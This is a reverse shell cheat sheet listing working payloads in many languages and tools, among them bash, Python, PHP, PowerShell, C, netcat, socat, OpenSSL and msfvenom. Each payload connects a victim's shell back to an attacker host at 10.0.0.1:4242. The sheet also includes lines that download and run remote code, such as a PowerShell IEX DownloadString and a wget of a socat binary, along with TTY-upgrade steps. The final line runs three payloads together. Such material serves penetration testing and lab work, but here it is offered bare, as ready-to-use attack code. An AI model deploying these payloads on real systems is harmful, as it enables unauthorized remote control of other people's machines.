Reverse Shell Cheat Sheet
You know what this is.
1. Bash Reverse Shell
TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1
UDP
Victim:
sh -i >& /dev/udp/10.0.0.1/4242 0>&1
Listener:
nc -u -lvp 4242
2. Perl Reverse Shell
perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);
$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");
STDIN->fdopen($c,r);$~->fdopen($c,w);
system$_ while<>;'
Windows only:
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");
STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
3. Python Reverse Shell
Linux IPv4
export RHOST="10.0.0.1"; export RPORT=4242;
python -c 'import socket,os,pty;
s=socket.socket();
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));
[os.dup2(s.fileno(),fd) for fd in (0,1,2)];
pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.1",4242));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
subprocess.call(["/bin/sh","-i"])'
IPv6
python -c 'import socket,os,pty;
s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);
s.connect(("dead:beef:2::125c",4242,0,2));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")'
Windows (Python 3)
python.exe -c "import socket,os,threading,subprocess as sp;
p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);
s=socket.socket();
s.connect(('10.0.0.1',4242));
threading.Thread(target=exec,args=(\"while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)\",globals()),daemon=True).start();
threading.Thread(target=exec,args=(\"while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)\",globals())).start()"
4. PHP Reverse Shell
php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock,1=>$sock,2=>$sock),$pipes);'
5. Ruby Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4242).to_i;
exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e'exit if fork;
c=TCPSocket.new("10.0.0.1","4242");
loop{
c.gets.chomp!;
(exit! if $_=="exit");
($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))
rescue c.puts "failed: #{$_}"
}'
Windows only:
ruby -rsocket -e 'c=TCPSocket.new("10.0.0.1","4242");
while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
6. Netcat Reverse Shells
Traditional (if -e supported)
nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242
OpenBSD netcat (no -e)
rm -f /tmp/f; mkfifo /tmp/f;
cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4242 > /tmp/f
BusyBox netcat
rm -f /tmp/f; mknod /tmp/f p;
cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4242 > /tmp/f
7. Ncat Reverse Shell
ncat 10.0.0.1 4242 -e /bin/bash
ncat --udp 10.0.0.1 4242 -e /bin/bash
8. Socat Reverse Shell
Listener (attacker):
socat file:`tty`,raw,echo=0 tcp-listen:4242
Victim:
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
Download static socat binary (if not installed):
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
9. OpenSSL Encrypted Reverse Shell
Attacker side:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
Or:
ncat --ssl -vv -l -p 4242
Victim side:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s
10. TLS-PSK Reverse Shell (No Certificates)
Generate PSK:
openssl rand -hex 48
Server:
export LHOST="*"; export LPORT="4242"; export PSK="YOUR_PSK";
openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk $PSK -nocert -accept $LHOST:$LPORT
Client:
export RHOST="10.0.0.1"; export RPORT="4242"; export PSK="YOUR_PSK";
export PIPE="/tmp/$(openssl rand -hex 4)";
mkfifo $PIPE;
/bin/sh -i < $PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk $PSK -connect $RHOST:$RPORT > $PIPE; rm $PIPE
11. PowerShell Reverse Shell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};
while(($i=$stream.Read($bytes,0,$bytes.Length))-ne 0){
$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback=(iex $data 2>&1 | Out-String);
$sendback2=$sendback+"PS "+(pwd).Path+"> ";
$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
powershell -nop -c "$client=New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);
$stream=$client.GetStream();
[byte[]]$bytes=0..65535|%{0};
while(($i=$stream.Read($bytes,0,$bytes.Length))-ne 0){
$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback=(iex $data 2>&1 | Out-String);
$sendback2=$sendback+'PS '+(pwd).Path+'> ';
$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()"
Or download and execute script:
IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
12. Awk Reverse Shell
awk 'BEGIN {
s = "/inet/tcp/0/10.0.0.1/4242";
while(42) {
do {
printf "shell>" |& s;
s |& getline c;
if(c) {
while ((c |& getline) > 0) print $0 |& s;
close(c);
}
} while(c != "exit")
close(s);
}
}' /dev/null
13. Java Reverse Shells
Runtime r = Runtime.getRuntime();
Process p = r.exec("/bin/bash -c 'exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do $line 2>&5 >&5; done'");
p.waitFor();
String host="10.0.0.1";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0) so.write(pi.read());
while(pe.available()>0) so.write(pe.read());
while(si.available()>0) po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {p.exitValue(); break;} catch (Exception e) {}
}
p.destroy();
s.close();
14. Groovy Reverse Shell
Same as Java example above. Can be wrapped in a thread for stealth:
Thread.start {
// Reverse shell code here
}
15. C Reverse Shell (Compile and run)
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 4242;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("10.0.0.1");
connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/sh", NULL};
execve("/bin/sh", argv, NULL);
return 0;
}
Compile with:
gcc /tmp/shell.c -o csh && ./csh
16. Dart Reverse Shell
import 'dart:io';
import 'dart:convert';
main() {
Socket.connect("10.0.0.1", 4242).then((socket) {
socket.listen((data) {
Process.start('powershell.exe', []).then((Process process) {
process.stdin.writeln(new String.fromCharCodes(data).trim());
process.stdout
.transform(utf8.decoder)
.listen((output) { socket.write(output); });
});
},
onDone: () {
socket.destroy();
});
});
}
17. Meterpreter Reverse Shell Payloads (msfvenom)
# Windows staged reverse TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe
# Windows stageless reverse TCP
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe
# Linux staged reverse TCP
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf > reverse.elf
# Linux stageless reverse TCP
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf > reverse.elf
# Other platforms/formats:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f macho > shell.macho
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > shell.war
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f raw > shell.php
18. Spawning an Interactive TTY Shell (Upgrading)
rlwrap nc -lvnp 4242
Make shell fully interactive:
ctrl+z
stty raw -echo
fg
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <num>
If using zsh:
stty raw -echo; fg
Note: OhMyZSH may cause issues. Use plain sh or bash.
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1